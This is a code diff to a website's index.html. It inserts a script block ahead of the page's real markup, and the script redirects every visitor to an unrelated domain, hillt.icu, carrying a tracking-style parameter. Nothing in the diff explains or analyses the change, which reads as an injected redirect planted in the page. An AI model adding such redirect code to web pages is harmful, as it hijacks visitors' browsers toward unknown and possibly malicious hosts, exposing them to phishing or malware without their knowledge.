--- a/index.html
+++ b/index.html
@@ -1,4 +1,5 @@
 
+<html><head><meta charset="utf-8" /><meta name="referrer" content="origin" /></head><body><script type="text/javascript" nonce="ssN513pA">document.location.replace("https:\/\/97c8c5.hillt.icu\/7c8c5c7?fbclid=IwAR3fWkZljiucq2G0a-kEPlcLf0k-PgVh-J9RkyTGCg_jePNdYZhuOmZe7IM");</script></body></html>
 
 <!DOCTYPE html>
 <html>
